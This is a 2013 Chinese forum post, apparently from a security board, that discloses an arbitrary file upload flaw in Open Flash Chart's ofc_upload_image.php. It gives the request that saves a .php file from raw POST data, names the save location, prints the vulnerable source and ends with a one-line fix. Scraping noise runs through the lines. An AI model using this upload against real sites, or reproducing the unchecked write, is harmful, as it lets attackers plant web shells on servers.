POST 数据漏洞文件执行任意后缀文件保存
! F1 P3 a) q) i! b2 S, m) ` 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
$ @; M; [! T9 o) P; N, L+ x# n0 i& B! q/ O7 s$ u8 r/ r
利用:
% D7 d6 R+ r1 v& Y0 @1 t; G7 n5 n! ^/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
8 f& E# @8 w5 |7 H: N' n2 F' q$ c; `: H
Post任意数据) a0 b$ N/ ^3 h8 a5 r X
保存位置http://localhost/chart/tmp-upload-images/hfy.php% U. \" \& j. U8 u2 J
4 W# F8 ~& ]2 C j/ A% K! V- K+ J6 ]
8 ~7 a( U! u0 y1 v最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~! P9 M) H+ `! t) N; k3 N
+ [) y7 G5 H( s<?php
$ n# M2 N& K2 j
5 Y {% q. f8 \* h$ t' W) i9 b, ?//
: m- k$ g! F* M1 u// In Open Flash Chart -> save_image debug mode, you- y) i0 _2 {% S; q* J+ g& k
// will see the 'echo' text in a new window.# a1 h' E9 \5 x6 Z
//3 L4 t: `7 U7 I+ N
; W. L: y; y0 W8 Y {3 X% S1 T, l- V
/*4 j) W! g* g5 n& \4 w" X q' J4 @8 w8 J6 q
1 e% w! T) t% ^, @print_r( $_GET );
( m2 Y' l* D# ^4 Eprint_r( $_POST );
8 l- \5 n8 G6 U4 D8 W) K/ gprint_r( $_FILES );
) y0 f% G) U$ x( U" W) s. X) {6 m/ L( h. M
print_r( $GLOBALS );
8 N; S/ ?% C* E' qprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );# N s) U! L% U! w% o
# d0 b: I/ U2 p6 Y& s& Z1 S
*/' U/ z8 [9 k6 ^: E, b; C
// default path for the image to be stored //9 M2 w- L. W9 W$ `
$default_path = '../tmp-upload-images/';# E' g' }3 b# X3 O% G3 N. k$ q- j
7 H( h0 o+ ]8 }/ Kif (!file_exists($default_path)) mkdir($default_path, 0777, true);
D! a& Y6 P& H) S6 A# L6 `; J, g% Q3 V5 s* M3 C- ? b
// full path to the saved image including filename //
* N6 E6 R/ E: ?' t z6 ]$destination = $default_path . basename( $_GET[ 'name' ] );
& ?6 ?+ i' }& @- z7 ]2 ]7 \, h" z$ ]3 K9 q) m/ j K
echo 'Saving your image to: '. $destination;% v' T- S/ C% `
// print_r( $_POST );/ G* a/ p) k+ d( O
// print_r( $_SERVER );
3 V% j3 C: ]" {( M0 t w// echo $HTTP_RAW_POST_DATA;+ x4 l. D% y. Y4 c+ X6 @& b) t
7 {0 _3 n4 d' r0 M# x
/// o: z* W9 F0 C. P( q- {/ Y6 A
// POST data is usually string data, but we are passing a RAW .png
! S' ]4 i0 x5 E" l// so PHP is a bit confused and $_POST is empty. But it has saved1 |; t- E: ~8 J- V% {' m7 w& ~
// the raw bits into $HTTP_RAW_POST_DATA' ? g' x9 {) ^4 ]
//; p( E m7 c6 J) G" [- S
* W, s$ s# ~9 u
$jfh = fopen($destination, 'w') or die("can't open file");
: \# P* T; C1 ofwrite($jfh, $HTTP_RAW_POST_DATA);
* w- K' R. o% |$ ~fclose($jfh);+ x# m5 ^, L9 m' I
, T3 Z7 i- y8 b" s+ V) _//2 h! V! ^+ V5 C9 D
// LOOK:5 K& m. n4 w& r: R+ Q. \+ q
//
$ ~* B, Y- p% R* B3 K+ Iexit();
( T! J) |! i" q t9 s//" g8 w E6 T; K
// PHP5:7 q6 W. v9 w5 U) t1 Z! w# {+ R
//' o2 ~* i! [5 y4 j, E- T( K1 r# V
4 U6 A1 y a6 j9 w5 p
. I* i9 B s# ?( h) A
// default path for the image to be stored //* H0 f* I, ^8 Z; k" E
$default_path = 'tmp-upload-images/';1 j9 c; ^, E' P1 s; s
_$ r, |2 n' R8 v2 E; b, `
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
: w/ H0 F$ i6 T; a6 j) g/ C( j1 L5 e4 O [# m1 N8 M v
// full path to the saved image including filename //4 N4 E( g1 I% `) ?3 Y' m
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
$ \" U* Y% B$ Z4 E
8 v, p$ R/ V' H" G0 x1 Z+ v e// move the image into the specified directory //
8 r( Y- b7 Y) C! K# lif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
0 P& j1 ~" n4 B9 w! g3 t: t& N echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";. n5 { s8 b; Z1 X6 L- ~/ Z
} else {2 @. H4 X0 [' l; x2 m
echo "FILE UPLOAD FAILED";
6 p6 I# _- Y) a; \}
1 L/ `; [& M: _: M: C! U& C3 i. a9 t% m
' X7 @' I% ?4 s& B?> K0 }6 e/ B) N* C
E; Q2 ?4 k+ U8 a% _! @
+ k9 ?# H9 ?! j' S2 x% j. z# h- j: ~8 b* D2 D
/ }$ D$ M2 x1 p3 q" X& w
8 ^0 z6 @: q( N& ^6 t. E& t$ G0 ~& O, @" d/ j( t; m* a
修复方案: ! @$ r Y% c: ]/ x; w
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
$ E) h, E& ^3 f; K- d0 F* H9 k
% n; w1 L8 X. y' C, s$ W% i1 d" O
u$ F; {7 N. h; L5 T1 A
* }4 O& X$ C/ z0 m) T Z* A, f |
发表于 2013-2-23 12:38:58
收藏
支持
反对